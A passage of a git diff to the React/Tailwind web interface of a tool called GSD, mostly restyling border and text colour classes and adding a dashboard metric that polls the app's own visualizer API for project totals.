               <p className="text-xs text-muted-foreground">{diag.summary.detail}</p>
             </div>
-            <div className="flex flex-wrap gap-2 border-t border-border/30 pt-3" data-testid="command-surface-recovery-actions">
+            <div className="flex flex-wrap gap-2 border-t border-border/50 pt-3" data-testid="command-surface-recovery-actions">
               <Button
                 type="button"
                 variant="default"
@@ -1113,7 +1117,7 @@ export function CommandSurface() {
                       <Badge variant={issue.severity === "error" ? "destructive" : "outline"} className="text-[10px]">{issue.code}</Badge>
                     </div>
                     <p className="mt-1 text-xs text-muted-foreground">{issue.message}</p>
-                    {issue.suggestion && <p className="mt-0.5 text-[11px] text-muted-foreground/70">→ {issue.suggestion}</p>}
+                    {issue.suggestion && <p className="mt-0.5 text-[11px] text-muted-foreground">→ {issue.suggestion}</p>}
                   </div>
                 ))}
               </div>
@@ -1152,7 +1156,7 @@ export function CommandSurface() {
             )}
 
             {/* Actions */}
-            <div className="flex flex-wrap gap-2 border-t border-border/30 pt-3" data-testid="command-surface-recovery-actions">
+            <div className="flex flex-wrap gap-2 border-t border-border/50 pt-3" data-testid="command-surface-recovery-actions">
               {diag.actions.browser.length > 0 ? (
                 diag.actions.browser.map((action) => (
                   <Button
@@ -1175,7 +1179,7 @@ export function CommandSurface() {
             </div>
 
             {diag.actions.commands.length > 0 && (
-              <div className="space-y-2 border-t border-border/30 pt-3" data-testid="command-surface-recovery-commands">
+              <div className="space-y-2 border-t border-border/50 pt-3" data-testid="command-surface-recovery-commands">
                 <div className="text-xs font-medium text-muted-foreground">Suggested commands</div>
                 {diag.actions.commands.map((command) => (
                   <div key={command.command} className="rounded-lg border border-border/50 bg-card/50 px-3 py-2 text-xs">
@@ -1255,7 +1259,7 @@ export function CommandSurface() {
               <span className="font-mono">{shortenPath(result.project.repoRoot, 3)}</span>
               {result.project.repoRelativePath && (
                 <>
-                  <ChevronRight className="h-3 w-3 text-foreground/20" />
+                  <ChevronRight className="h-3 w-3 text-muted-foreground" />
                   <span className="font-mono">{result.project.repoRelativePath}</span>
                 </>
               )}
@@ -1271,15 +1275,15 @@ export function CommandSurface() {
               ].map(({ label, count, active, color }) => (
                 <div key={label} className={cn(
                   "rounded-md border px-2 py-2 text-center transition-colors",
-                  active ? "border-border/60 bg-card/80" : "border-border/30 bg-card/30",
+                  active ? "border-border bg-card" : "border-border/50 bg-card/50",
                 )}>
                   <div className={cn(
                     "text-base font-semibold tabular-nums leading-none",
-                    active ? color : "text-foreground/25",
+                    active ? color : "text-muted-foreground",
                   )}>{count}</div>
                   <div className={cn(
                     "mt-1.5 text-[10px] leading-none",
-                    active ? "text-muted-foreground" : "text-muted-foreground/50",
+                    active ? "text-muted-foreground" : "text-muted-foreground",
                   )}>{label}</div>
                 </div>
               ))}
@@ -1289,14 +1293,14 @@ export function CommandSurface() {
             {result.changedFiles.length > 0 && (
               <div data-testid="command-surface-git-files">
                 <div className="mb-2 flex items-center justify-between">
-                  <span className="text-[11px] font-medium uppercase tracking-[0.06em] text-muted-foreground/70">
+                  <span className="text-[11px] font-medium uppercase tracking-[0.06em] text-muted-foreground">
                     Changes
                   </span>
-                  <span className="text-[11px] tabular-nums text-muted-foreground/50">
+                  <span className="text-[11px] tabular-nums text-muted-foreground">
                     {result.changedFiles.length}{result.truncatedFileCount > 0 ? `+${result.truncatedFileCount}` : ""} files
                   </span>
                 </div>
-                <div className="space-y-px rounded-lg border border-border/40 bg-card/30 overflow-hidden">
+                <div className="space-y-px rounded-lg border border-border/50 bg-card/50 overflow-hidden">
                   {result.changedFiles.map((file) => (
                     <div
                       key={`${file.status}:${file.repoPath}`}
@@ -1320,7 +1324,7 @@ export function CommandSurface() {
                   ))}
                 </div>
                 {result.truncatedFileCount > 0 && (
-                  <p className="mt-1.5 text-center text-[11px] text-muted-foreground/50">
+                  <p className="mt-1.5 text-center text-[11px] text-muted-foreground">
                     +{result.truncatedFileCount} more files not shown
                   </p>
                 )}
@@ -1388,7 +1392,7 @@ export function CommandSurface() {
           <button
             type="button"
             className={cn(
-              "rounded-md border border-border/60 px-2.5 py-1.5 text-[11px] font-medium transition-colors",
+              "rounded-md border border-border px-2.5 py-1.5 text-[11px] font-medium transition-colors",
               sessionBrowser.nameFilter === "named" ? "bg-foreground/10 text-foreground" : "text-muted-foreground hover:text-foreground",
             )}
             onClick={() => {
@@ -1448,7 +1452,7 @@ export function CommandSurface() {
                     {session.name && session.firstMessage && (
                       <p className="mt-0.5 truncate text-xs text-muted-foreground">{session.firstMessage}</p>
                     )}
-                    <div className="mt-0.5 flex gap-3 text-[11px] text-muted-foreground/70">
+                    <div className="mt-0.5 flex gap-3 text-[11px] text-muted-foreground">
                       <span>{session.messageCount} msgs</span>
                       <span>{formatRelativeTime(session.modifiedAt)}</span>
                     </div>
@@ -1469,7 +1473,7 @@ export function CommandSurface() {
 
         {/* Rename controls */}
         {renameMode && (
-          <div className="space-y-3 border-t border-border/30 pt-3">
+          <div className="space-y-3 border-t border-border/50 pt-3">
             <div className="flex gap-2">
               <Input
                 value={selectedNameTarget?.name ?? ""}
@@ -1500,7 +1504,7 @@ export function CommandSurface() {
 
         {/* Resume controls */}
         {!renameMode && (
-          <div className="flex items-center justify-between border-t border-border/30 pt-3">
+          <div className="flex items-center justify-between border-t border-border/50 pt-3">
             <span className="text-xs text-muted-foreground" data-testid="command-surface-resume-state">
               {resumeBusy ? "Switching…" : commandSurface.resumeRequest.error ?? commandSurface.resumeRequest.result ?? "Select a session"}
             </span>
@@ -1559,7 +1563,7 @@ export function CommandSurface() {
                   {selected && <Check className="h-2.5 w-2.5 text-background" />}
                 </div>
                 <div className="min-w-0 flex-1">
-                  <div className="font-mono text-[10px] text-muted-foreground/60">{message.entryId}</div>
+                  <div className="font-mono text-[10px] text-muted-foreground">{message.entryId}</div>
                   <p className="mt-0.5 text-sm text-foreground">{message.text}</p>
                 </div>
               </button>
@@ -1570,7 +1574,7 @@ export function CommandSurface() {
         <p className="py-4 text-center text-xs text-muted-foreground">No fork points available yet.</p>
       )}
 
-      <div className="flex justify-end border-t border-border/40 pt-3">
+      <div className="flex justify-end border-t border-border/50 pt-3">
         <Button
           type="button"
           size="sm"
@@ -1643,7 +1647,7 @@ export function CommandSurface() {
       )}
 
       {/* Export */}
-      <div className="space-y-3 border-t border-border/30 pt-3">
+      <div className="space-y-3 border-t border-border/50 pt-3">
         <div className="text-xs font-medium text-muted-foreground">Export</div>
         <div className="flex gap-2">
           <Input
@@ -1775,7 +1779,7 @@ export function CommandSurface() {
                   </span>
                 </div>
                 {provider.recommended && (
-                  <span className="rounded bg-foreground/10 px-1.5 py-0.5 text-[10px] font-medium text-foreground/70">Recommended</span>
+                  <span className="rounded bg-foreground/10 px-1.5 py-0.5 text-[10px] font-medium text-muted-foreground">Recommended</span>
                 )}
               </button>
             )
@@ -1784,7 +1788,7 @@ export function CommandSurface() {
 
         {/* Selected provider details */}
         {selectedAuthProvider && (
-          <div className="space-y-4 border-t border-border/30 pt-3">
+          <div className="space-y-4 border-t border-border/50 pt-3">
             <div className="flex items-center justify-between">
               <div>
                 <div className="text-sm font-medium text-foreground">{selectedAuthProvider.label}</div>
@@ -1895,7 +1899,7 @@ export function CommandSurface() {
                 {activeFlow.progress.length > 0 && (
                   <div className="space-y-1">
                     {activeFlow.progress.map((message, index) => (
-                      <div key={`${activeFlow.flowId}-${index}`} className="rounded-md border border-border/40 bg-card/30 px-2.5 py-1.5 text-xs text-muted-foreground">
+                      <div key={`${activeFlow.flowId}-${index}`} className="rounded-md border border-border/50 bg-card/50 px-2.5 py-1.5 text-xs text-muted-foreground">
                         {message}
                       </div>
                     ))}
@@ -1983,7 +1987,7 @@ export function CommandSurface() {
 
       {/* Individual overrides — only visible when master is on */}
       {devOverrides.enabled && (
-        <div className="space-y-2 rounded-lg border border-border/50 bg-card/30 p-3">
+        <div className="space-y-2 rounded-lg border border-border/50 bg-card/50 p-3">
           <div className="text-[11px] font-semibold uppercase tracking-wider text-muted-foreground">
             Override shortcuts
           </div>
@@ -1995,7 +1999,7 @@ export function CommandSurface() {
               <div className="min-w-0 flex-1">
                 <div className="flex items-center gap-2">
                   <span className="text-sm font-medium text-foreground">{entry.label}</span>
-                  <Badge variant="outline" className="border-border/60 font-mono text-[10px] text-muted-foreground">
+                  <Badge variant="outline" className="border-border font-mono text-[10px] text-muted-foreground">
                     {entry.shortcutLabel}
                   </Badge>
                 </div>
@@ -2012,7 +2016,7 @@ export function CommandSurface() {
       )}
 
       {/* Onboarding — one-click launch */}
-      <div className="rounded-lg border border-border/50 bg-card/30 p-3 space-y-3">
+      <div className="rounded-lg border border-border/50 bg-card/50 p-3 space-y-3">
         <div className="text-[11px] font-semibold uppercase tracking-wider text-muted-foreground">
           Onboarding
         </div>
@@ -2042,7 +2046,7 @@ export function CommandSurface() {
         </div>
       </div>
 
-      <div className="rounded-lg border border-border/40 bg-card/30 px-3 py-2.5 text-xs text-muted-foreground">
+      <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 text-xs text-muted-foreground">
         This tab is only visible when running via{" "}
         <code className="rounded bg-muted px-1 py-0.5 font-mono text-[11px]">npm run gsd:web</code>.
         Overrides reset on page refresh.
@@ -2053,10 +2057,11 @@ export function CommandSurface() {
   const renderSection = () => {
     switch (commandSurface.section) {
       case "general": return <GeneralPanel />
+      case "experimental": return <ExperimentalPanel />
       case "model": return (
         <div className="space-y-8">
           {renderModelSection()}
-          <div className="border-t border-border/30 pt-6">
+          <div className="border-t border-border/50 pt-6">
             {renderThinkingSection()}
           </div>
         </div>
@@ -2064,7 +2069,7 @@ export function CommandSurface() {
       case "thinking": return (
         <div className="space-y-8">
           {renderModelSection()}
-          <div className="border-t border-border/30 pt-6">
+          <div className="border-t border-border/50 pt-6">
             {renderThinkingSection()}
           </div>
         </div>
@@ -2072,10 +2077,10 @@ export function CommandSurface() {
       case "session-behavior": return (
         <div className="space-y-6">
           {renderQueueSection()}
-          <div className="border-t border-border/30 pt-4">
+          <div className="border-t border-border/50 pt-4">
             {renderCompactionSection()}
           </div>
-          <div className="border-t border-border/30 pt-4">
+          <div className="border-t border-border/50 pt-4">
             {renderRetrySection()}
           </div>
         </div>
@@ -2084,10 +2089,10 @@ export function CommandSurface() {
       case "queue": return (
         <div className="space-y-6">
           {renderQueueSection()}
-          <div className="border-t border-border/30 pt-4">
+          <div className="border-t border-border/50 pt-4">
             {renderCompactionSection()}
           </div>
-          <div className="border-t border-border/30 pt-4">
+          <div className="border-t border-border/50 pt-4">
             {renderRetrySection()}
           </div>
         </div>
@@ -2095,10 +2100,10 @@ export function CommandSurface() {
       case "compaction": return (
         <div className="space-y-6">
           {renderQueueSection()}
-          <div className="border-t border-border/30 pt-4">
+          <div className="border-t border-border/50 pt-4">
             {renderCompactionSection()}
           </div>
-          <div className="border-t border-border/30 pt-4">
+          <div className="border-t border-border/50 pt-4">
             {renderRetrySection()}
           </div>
         </div>
@@ -2106,10 +2111,10 @@ export function CommandSurface() {
       case "retry": return (
         <div className="space-y-6">
           {renderQueueSection()}
-          <div className="border-t border-border/30 pt-4">
+          <div className="border-t border-border/50 pt-4">
             {renderCompactionSection()}
           </div>
-          <div className="border-t border-border/30 pt-4">
+          <div className="border-t border-border/50 pt-4">
             {renderRetrySection()}
           </div>
         </div>
@@ -2139,6 +2144,7 @@ export function CommandSurface() {
           <BudgetPanel />
           <RemoteQuestionsPanel />
           <GeneralPanel />
+          <ExperimentalPanel />
         </div>
       )
       case "gsd-mode": return <ModelRoutingPanel />
@@ -2182,7 +2188,7 @@ export function CommandSurface() {
     const isClean = gitResult?.kind === "repo" && !hasChanges
 
     return (
-      <div className="border-b border-border/40 px-5 py-4">
+      <div className="border-b border-border/50 px-5 py-4">
         <div className="flex items-start justify-between gap-3">
           <div className="flex items-center gap-3">
             <div className={cn(
@@ -2200,7 +2206,7 @@ export function CommandSurface() {
                   {branchName ?? "Git"}
                 </h2>
                 {branchName && mainBranch && branchName !== mainBranch && (
-                  <span className="text-[11px] text-muted-foreground/50">from {mainBranch}</span>
+                  <span className="text-[11px] text-muted-foreground">from {mainBranch}</span>
                 )}
               </div>
               {gitResult?.kind === "repo" && (
@@ -2242,7 +2248,7 @@ export function CommandSurface() {
   }
 
   const renderDefaultHeader = () => (
-    <div className="flex items-center justify-between gap-3 border-b border-border/40 px-5 py-4">
+    <div className="flex items-center justify-between gap-3 border-b border-border/50 px-5 py-4">
       <div>
         <div className="text-xs uppercase tracking-wider text-muted-foreground">Command surface</div>
         <div className="text-lg font-semibold text-foreground" data-testid="command-surface-title">
@@ -2279,7 +2285,7 @@ export function CommandSurface() {
         <div className="flex h-full min-h-0">
           {/* ─── Left nav rail (hidden for single-section surfaces) ─── */}
           {!isSingleSection && (
-            <nav className="flex w-12 shrink-0 flex-col items-center gap-0.5 border-r border-border/40 bg-card/30 py-3" data-testid="command-surface-sections">
+            <nav className="flex w-12 shrink-0 flex-col items-center gap-0.5 border-r border-border/50 bg-card/50 py-3" data-testid="command-surface-sections">
               {surfaceSections.map((section) => {
                 const active = commandSurface.section === section
                 return (
@@ -2314,7 +2320,7 @@ export function CommandSurface() {
             {(commandSurface.lastResult || commandSurface.lastError) && (
               <div
                 className={cn(
-                  "border-b border-border/30 px-5 py-3 text-xs",
+                  "border-b border-border/50 px-5 py-3 text-xs",
                   commandSurface.lastError ? "bg-destructive/5 text-destructive" : "bg-success/5 text-success",
                 )}
                 data-testid="command-surface-result"
diff --git a/web/components/gsd/dashboard.tsx b/web/components/gsd/dashboard.tsx
index 495ce4bc5..6b8017aff 100644
--- a/web/components/gsd/dashboard.tsx
+++ b/web/components/gsd/dashboard.tsx
@@ -1,5 +1,6 @@
 "use client"
 
+import { useEffect, useState, useCallback } from "react"
 import {
   Activity,
   Clock,
@@ -9,14 +10,14 @@ import {
   Circle,
   Play,
   GitBranch,
-  Loader2,
-  Milestone,
+  TrendingDown,
 } from "lucide-react"
 import { cn } from "@/lib/utils"
 import {
   useGSDWorkspaceState,
   useGSDWorkspaceActions,
   buildPromptCommand,
+  buildProjectUrl,
   formatDuration,
   formatCost,
   formatTokens,
@@ -38,6 +39,8 @@ import {
 } from "@/components/gsd/loading-skeletons"
 import { ScopeBadge } from "@/components/gsd/scope-badge"
 import { ProjectWelcome } from "@/components/gsd/project-welcome"
+import { authFetch } from "@/lib/auth"
+import { type ProjectTotals } from "@/lib/visualizer-types"
 
 /** Interpolate progress bar color from red (0%) through yellow (50%) to green (100%) using oklch. */
 function getProgressColor(percent: number): string {
@@ -83,11 +86,11 @@ function MetricCard({ label, value, subtext, icon }: MetricCardProps) {
 function taskStatusIcon(status: ItemStatus) {
   switch (status) {
     case "done":
-      return <CheckCircle2 className="h-4 w-4 text-foreground/70" />
+      return <CheckCircle2 className="h-4 w-4 text-muted-foreground" />
     case "in-progress":
       return <Play className="h-4 w-4 text-foreground" />
     case "pending":
-      return <Circle className="h-4 w-4 text-muted-foreground/50" />
+      return <Circle className="h-4 w-4 text-muted-foreground" />
   }
 }
 
@@ -114,12 +117,43 @@ export function Dashboard({ onSwitchView, onExpandTerminal }: DashboardProps = {
   const workspace = getLiveWorkspaceIndex(state)
   const auto = getLiveAutoDashboard(state)
   const bridge = boot?.bridge ?? null
-  const projectCwd = boot?.project.cwd ?? null
   const freshness = state.live.freshness
+  const projectCwd = boot?.project.cwd
 
-  const elapsed = auto?.elapsed ?? 0
-  const totalCost = auto?.totalCost ?? 0
-  const totalTokens = auto?.totalTokens ?? 0
+  // ── Project-level totals from visualizer API ──
+  // Provides fallback metrics when auto-mode is not active (#2709).
+  // Same polling pattern as status-bar.tsx.
+  const [projectTotals, setProjectTotals] = useState<ProjectTotals | null>(null)
+
+  const fetchProjectTotals = useCallback(async () => {
+    try {
+      const resp = await authFetch(buildProjectUrl("/api/visualizer", projectCwd))
+      if (!resp.ok) return
+      const json = await resp.json()
+      if (json.totals) setProjectTotals(json.totals)
+    } catch {
+      // Silently ignore — dashboard metrics are non-critical
+    }
+  }, [projectCwd])
+
+  useEffect(() => {
+    const timeout = window.setTimeout(() => {
+      void fetchProjectTotals()
+    }, 0)
+    const interval = window.setInterval(() => {
+      void fetchProjectTotals()
+    }, 30_000)
+    return () => {
+      window.clearTimeout(timeout)
+      window.clearInterval(interval)
+    }
+  }, [fetchProjectTotals])
+
+  const elapsed = projectTotals?.duration ?? auto?.elapsed ?? 0
+  const totalCost = projectTotals?.cost ?? auto?.totalCost ?? 0
+  const totalTokens = projectTotals?.tokens.total ?? auto?.totalTokens ?? 0
+  const rtkSavings = auto?.rtkSavings ?? null
+  const rtkEnabled = auto?.rtkEnabled === true
 
   const currentSlice = getCurrentSlice(workspace)
   const doneTasks = currentSlice?.tasks.filter((t) => t.done).length ?? 0
@@ -157,6 +191,13 @@ export function Dashboard({ onSwitchView, onExpandTerminal }: DashboardProps = {
   const recentLines: WorkspaceTerminalLine[] = (state.terminalLines ?? []).slice(-6)
   const isConnecting = state.bootStatus === "idle" || state.bootStatus === "loading"
 
+  const rtkValue = isConnecting ? null : formatTokens(rtkSavings?.savedTokens ?? 0)
+  const rtkSubtext = isConnecting
+    ? null
+    : rtkSavings && rtkSavings.commands > 0
+      ? `${Math.round(rtkSavings.savingsPct)}% saved • ${rtkSavings.commands} cmd${rtkSavings.commands === 1 ? "" : "s"}`
+      : "Waiting for shell usage"
+
   // ─── Project Welcome Gate ───────────────────────────────────────────
   // Show welcome screen for projects that aren't initialized with GSD yet
   const detection = boot?.projectDetection
@@ -181,18 +222,18 @@ export function Dashboard({ onSwitchView, onExpandTerminal }: DashboardProps = {
 
   return (
     <div className="flex h-full flex-col overflow-hidden">
-      <div className="flex items-center justify-between border-b border-border px-6 py-3">
-        <div className="flex items-center gap-2">
-          <h1 className="text-lg font-semibold">Dashboard</h1>
+      <div className="flex items-center justify-between border-b border-border px-3 py-2 md:px-6 md:py-3">
+        <div className="flex items-center gap-2 min-w-0">
+          <h1 className="text-base md:text-lg font-semibold shrink-0">Dashboard</h1>
           {!isConnecting && scopeLabel && (
             <>
-              <span className="text-lg font-thin text-muted-foreground/40 select-none">/</span>
-              <ScopeBadge label={scopeLabel} size="sm" />
+              <span className="hidden sm:inline text-lg font-thin text-muted-foreground select-none">/</span>
+              <span className="hidden sm:inline"><ScopeBadge label={scopeLabel} size="sm" /></span>
             </>
           )}
           {isConnecting && <Skeleton className="h-4 w-40" />}
         </div>
-        <div className="flex items-center gap-3" data-testid="dashboard-action-bar">
+        <div className="flex items-center gap-2 md:gap-3" data-testid="dashboard-action-bar">
           {isConnecting ? (
             <>
               <Skeleton className="h-8 w-40 rounded-md" />
@@ -220,8 +261,8 @@ export function Dashboard({ onSwitchView, onExpandTerminal }: DashboardProps = {
         </div>
       </div>
 
-      <div className="flex-1 overflow-y-auto p-6">
-        <div className="grid gap-4 md:grid-cols-2 xl:grid-cols-4">
+      <div className="flex-1 overflow-y-auto p-3 md:p-6">
+        <div className="grid grid-cols-1 gap-3 sm:grid-cols-2 md:grid-cols-2 xl:grid-cols-4 2xl:grid-cols-5">
           <div className="rounded-md border border-border bg-card p-4" data-testid="dashboard-current-unit">
             <div className="flex items-start justify-between gap-3">
               <div className="min-w-0">
@@ -262,6 +303,14 @@ export function Dashboard({ onSwitchView, onExpandTerminal }: DashboardProps = {
             value={isConnecting ? null : formatTokens(totalTokens)}
             icon={<Zap className="h-5 w-5" />}
           />
+          {rtkEnabled && (
+            <MetricCard
+              label="RTK Saved"
+              value={rtkValue}
+              subtext={rtkSubtext}
+              icon={<TrendingDown className="h-5 w-5" />}
+            />
+          )}
 
         </div>
 
@@ -336,7 +385,7 @@ export function Dashboard({ onSwitchView, onExpandTerminal }: DashboardProps = {
                             {task.title}
                           </span>
                           {status === "in-progress" && (
-                            <span className="shrink-0 rounded-sm bg-foreground/10 px-1.5 py-0.5 text-[10px] font-medium uppercase tracking-wide text-foreground/70">
+                            <span className="shrink-0 rounded-sm bg-foreground/10 px-1.5 py-0.5 text-[10px] font-medium uppercase tracking-wide text-muted-foreground">
                               active
                             </span>
                           )}
diff --git a/web/components/gsd/diagnostics-panels.tsx b/web/components/gsd/diagnostics-panels.tsx
index 5b556815b..e3c9b098f 100644
--- a/web/components/gsd/diagnostics-panels.tsx
+++ b/web/components/gsd/diagnostics-panels.tsx
@@ -58,7 +58,7 @@ function DiagHeader({
   return (
     <div className="flex items-center justify-between gap-3 pb-4">
       <div className="flex items-center gap-2.5">
-        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-foreground/70">{title}</h3>
+        <h3 className="text-[13px] font-semibold uppercase tracking-[0.08em] text-muted-foreground">{title}</h3>
         {status}
         {subtitle && <span className="text-[11px] text-muted-foreground">{subtitle}</span>}
       </div>
@@ -89,7 +89,7 @@ function DiagLoading({ label }: { label: string }) {
 
 function DiagEmpty({ message }: { message: string }) {
   return (
-    <div className="rounded-lg border border-border/30 bg-card/30 px-4 py-5 text-center text-xs text-muted-foreground">
+    <div className="rounded-lg border border-border/50 bg-card/50 px-4 py-5 text-center text-xs text-muted-foreground">
       {message}
     </div>
   )
@@ -102,7 +102,7 @@ function StatPill({ label, value, variant }: { label: string; value: number | st
       variant === "error" && "border-destructive/20 bg-destructive/5 text-destructive",
       variant === "warning" && "border-warning/20 bg-warning/5 text-warning",
       variant === "info" && "border-info/20 bg-info/5 text-info",
-      (!variant || variant === "default") && "border-border/40 bg-card/50 text-foreground/80",
+      (!variant || variant === "default") && "border-border/50 bg-card/50 text-foreground/80",
     )}>
       <span className="text-muted-foreground">{label}</span>
       <span className="font-medium tabular-nums">{value}</span>
@@ -116,7 +116,7 @@ function StatPill({ label, value, variant }: { label: string; value: number | st
 
 function AnomalyRow({ anomaly }: { anomaly: ForensicAnomaly }) {
   return (
-    <div className="rounded-lg border border-border/30 bg-card/30 px-3 py-2.5 space-y-1">
+    <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 space-y-1">
       <div className="flex items-center gap-2">
         <SeverityIcon severity={anomaly.severity} />
         <Badge variant={severityBadgeVariant(anomaly.severity)} className="text-[10px] px-1.5 py-0">{anomaly.severity}</Badge>
@@ -125,7 +125,7 @@ function AnomalyRow({ anomaly }: { anomaly: ForensicAnomaly }) {
           <span className="text-[10px] text-muted-foreground font-mono truncate">{anomaly.unitType}/{anomaly.unitId}</span>
         )}
       </div>
-      <p className="text-xs text-foreground/90">{anomaly.summary}</p>
+      <p className="text-xs text-foreground">{anomaly.summary}</p>
       {anomaly.details && anomaly.details !== anomaly.summary && (
         <p className="text-[11px] text-muted-foreground leading-relaxed">{anomaly.details}</p>
       )}
@@ -187,7 +187,7 @@ export function ForensicsPanel() {
               </div>
             </div>
           ) : (
-            <div className="flex items-center gap-2 rounded-lg border border-border/30 bg-card/30 px-3 py-2 text-xs text-muted-foreground">
+            <div className="flex items-center gap-2 rounded-lg border border-border/50 bg-card/50 px-3 py-2 text-xs text-muted-foreground">
               <CheckCircle2 className="h-3.5 w-3.5 text-success" />
               No crash lock
             </div>
@@ -196,7 +196,7 @@ export function ForensicsPanel() {
           {/* Anomalies */}
           {data.anomalies.length > 0 ? (
             <div className="space-y-2">
-              <h4 className="text-xs font-medium text-foreground/70">Anomalies ({data.anomalies.length})</h4>
+              <h4 className="text-xs font-medium text-muted-foreground">Anomalies ({data.anomalies.length})</h4>
               {data.anomalies.map((a, i) => <AnomalyRow key={i} anomaly={a} />)}
             </div>
           ) : (
@@ -206,11 +206,11 @@ export function ForensicsPanel() {
           {/* Recent units */}
           {data.recentUnits.length > 0 && (
             <div className="space-y-2">
-              <h4 className="text-xs font-medium text-foreground/70">Recent Units ({data.recentUnits.length})</h4>
-              <div className="overflow-x-auto rounded-lg border border-border/30">
+              <h4 className="text-xs font-medium text-muted-foreground">Recent Units ({data.recentUnits.length})</h4>
+              <div className="overflow-x-auto rounded-lg border border-border/50">
                 <table className="w-full text-[11px]">
                   <thead>
-                    <tr className="border-b border-border/30 bg-card/40">
+                    <tr className="border-b border-border/50 bg-card/50">
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Type</th>
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">ID</th>
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Model</th>
@@ -220,7 +220,7 @@ export function ForensicsPanel() {
                   </thead>
                   <tbody>
                     {data.recentUnits.map((u, i) => (
-                      <tr key={i} className="border-b border-border/20 last:border-0">
+                      <tr key={i} className="border-b border-border/50 last:border-0">
                         <td className="px-2.5 py-1.5 font-mono text-foreground/80">{u.type}</td>
                         <td className="px-2.5 py-1.5 font-mono text-foreground/80 truncate max-w-[120px]">{u.id}</td>
                         <td className="px-2.5 py-1.5 text-muted-foreground">{u.model}</td>
@@ -249,7 +249,7 @@ function humanizeCode(code: string): string {
 
 function IssueRow({ issue }: { issue: DoctorIssue }) {
   return (
-    <div className="rounded-lg border border-border/30 bg-card/30 px-3 py-2.5 space-y-1">
+    <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 space-y-1">
       <div className="flex items-center gap-2 flex-wrap">
         <SeverityIcon severity={issue.severity} />
         <Badge variant={severityBadgeVariant(issue.severity)} className="text-[10px] px-1.5 py-0">{issue.severity}</Badge>
@@ -261,7 +261,7 @@ function IssueRow({ issue }: { issue: DoctorIssue }) {
           </Badge>
         )}
       </div>
-      <p className="text-xs text-foreground/90">{issue.message}</p>
+      <p className="text-xs text-foreground">{issue.message}</p>
       {issue.file && <p className="text-[10px] font-mono text-muted-foreground truncate">{issue.file}</p>}
     </div>
   )
@@ -349,7 +349,7 @@ export function DoctorPanel() {
           {/* Issue list */}
           {data.issues.length > 0 ? (
             <div className="space-y-2">
-              <h4 className="text-xs font-medium text-foreground/70">Issues ({data.issues.length})</h4>
+              <h4 className="text-xs font-medium text-muted-foreground">Issues ({data.issues.length})</h4>
               {data.issues.map((issue, i) => <IssueRow key={i} issue={issue} />)}
             </div>
           ) : (
@@ -379,14 +379,14 @@ function trendColor(trend: "stable" | "rising" | "declining"): string {
 
 function SuggestionRow({ suggestion }: { suggestion: SkillHealSuggestion }) {
   return (
-    <div className="rounded-lg border border-border/30 bg-card/30 px-3 py-2.5 space-y-1">
+    <div className="rounded-lg border border-border/50 bg-card/50 px-3 py-2.5 space-y-1">
       <div className="flex items-center gap-2 flex-wrap">
         <SeverityIcon severity={suggestion.severity} />
         <Badge variant={severityBadgeVariant(suggestion.severity)} className="text-[10px] px-1.5 py-0">{suggestion.severity}</Badge>
         <span className="text-[11px] font-medium text-foreground/80">{suggestion.skillName}</span>
         <Badge variant="outline" className="text-[10px] px-1.5 py-0 font-mono">{suggestion.trigger.replace(/_/g, " ")}</Badge>
       </div>
-      <p className="text-xs text-foreground/90">{suggestion.message}</p>
+      <p className="text-xs text-foreground">{suggestion.message}</p>
     </div>
   )
 }
@@ -429,11 +429,11 @@ export function SkillHealthPanel() {
           {/* Skill table */}
           {data.skills.length > 0 && (
             <div className="space-y-2">
-              <h4 className="text-xs font-medium text-foreground/70">Skills ({data.skills.length})</h4>
-              <div className="overflow-x-auto rounded-lg border border-border/30">
+              <h4 className="text-xs font-medium text-muted-foreground">Skills ({data.skills.length})</h4>
+              <div className="overflow-x-auto rounded-lg border border-border/50">
                 <table className="w-full text-[11px]">
                   <thead>
-                    <tr className="border-b border-border/30 bg-card/40">
+                    <tr className="border-b border-border/50 bg-card/50">
                       <th className="px-2.5 py-1.5 text-left font-medium text-muted-foreground">Skill</th>
                       <th className="px-2.5 py-1.5 text-right font-medium text-muted-foreground">Uses</th>
                       <th className="px-2.5 py-1.5 text-right font-medium text-muted-foreground">Success</th>
@@ -446,7 +446,7 @@ export function SkillHealthPanel() {
                   <tbody>
                     {data.skills.map((skill) => (
                       <tr key={skill.name} className={cn(
-                        "border-b border-border/20 last:border-0",
+                        "border-b border-border/50 last:border-0",
                         skill.flagged && "bg-destructive/3",
                       )}>
                         <td className="px-2.5 py-1.5 font-mono text-foreground/80">
@@ -484,7 +484,7 @@ export function SkillHealthPanel() {
           {/* Stale skills */}
           {data.staleSkills.length > 0 && (
             <div className="space-y-1.5">
-              <h4 className="text-xs font-medium text-foreground/70">Stale Skills</h4>
+              <h4 className="text-xs font-medium text-muted-foreground">Stale Skills</h4>
               <div className="flex flex-wrap gap-1.5">
                 {data.staleSkills.map((name) => (
                   <Badge key={name} variant="secondary" className="text-[10px] font-mono">{name}</Badge>
@@ -496,7 +496,7 @@ export function SkillHealthPanel() {
           {/* Declining skills */}
           {data.decliningSkills.length > 0 && (
             <div className="space-y-1.5">
-              <h4 className="text-xs font-medium text-foreground/70">Declining Skills</h4>
+              <h4 className="text-xs font-medium text-muted-foreground">Declining Skills</h4>
               <div className="flex flex-wrap gap-1.5">
                 {data.decliningSkills.map((name) => (
                   <Badge key={name} variant="destructive" className="text-[10px] font-mono">{name}</Badge>
@@ -508,7 +508,7 @@ export function SkillHealthPanel() {
           {/* Suggestions */}
           {data.suggestions.length > 0 && (
             <div className="space-y-2">
-              <h4 className="text-xs font-medium text-foreground/70">Suggestions ({data.suggestions.length})</h4>
+              <h4 className="text-xs font-medium text-muted-foreground">Suggestions ({data.suggestions.length})</h4>
               {data.suggestions.map((s, i) => <SuggestionRow key={i} suggestion={s} />)}
             </div>
           )}
diff --git a/web/components/gsd/file-content-viewer.tsx b/web/components/gsd/file-content-viewer.tsx
index b99becfb0..dd8ee0471 100644
--- a/web/components/gsd/file-content-viewer.tsx
+++ b/web/components/gsd/file-content-viewer.tsx
@@ -204,7 +204,7 @@ function PlainViewer({ content }: { content: string }) {
           {lines.map((line, i) => (
             <tr key={i} className="hover:bg-accent/20">
               <td
-                className="select-none pr-4 text-right text-muted-foreground/40 align-top"
